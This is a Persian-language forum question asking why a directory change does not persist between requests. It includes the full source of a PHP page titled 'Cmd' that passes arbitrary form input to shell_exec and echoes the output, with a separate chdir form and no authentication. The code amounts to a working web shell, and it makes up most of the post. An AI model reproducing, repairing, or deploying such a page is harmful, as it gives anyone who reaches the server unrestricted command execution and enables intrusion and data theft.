سلام
در کد زیر وقتی در قسمت command line دستور dir رو وارد می کنم محتویات پوشه www رو نشون میده ولی وقتی از قسمت change directory پوشه جاری رو تغییر میدم با زدن دستور dir به جای اینکه محتویات پوشه تغییر داده شده رو نشون بده دوباره محتویات پوشه www رو نشون میده! میشه در این باره راهنمایی کنین

<html>

    <body>
    <title>Cmd</title>
        <form action="" method="post">
            <b>Command Line : <font face=Wingdings color=gray></font></b><input type="text" name="subject" size=125>
            <input type="submit" value="Run Command" name="submit">
        </form>
<table width=1000px cellpadding=0 cellspacing=0 bgcolor=#396D95>
<tr><td bgcolor=#396D95><font face=Verdana size=-2></font></td></tr>
<tr><td><b><div align=center><textarea name=report cols=121 rows=15>
<?php
if (isset($_POST['submit'])) {
    $subject = $_POST['subject'];
    $output = shell_exec($subject);
    echo "$output";
} else {
    echo "";
}    
?>
</textarea></div></b></td></tr></table>
    </body>
</html>
<form action="" method="post">
<td class=td1 width=15% align=left><b>Change Directory :<font face=Wingdings color=gray></font></b></td>
<td class=td1 align=left><input type="text" name="dir" size=85><input type="submit" name="run" value="Run"></td>
<td class=td1 align=left>
</form>
<?php
if (isset($_POST['run'])) {
    $dir = $_POST['dir'];
     chdir($dir);
} else {
    echo "";
}    
?>
<b>
<?php
    echo getcwd();
?>
</b>
</td>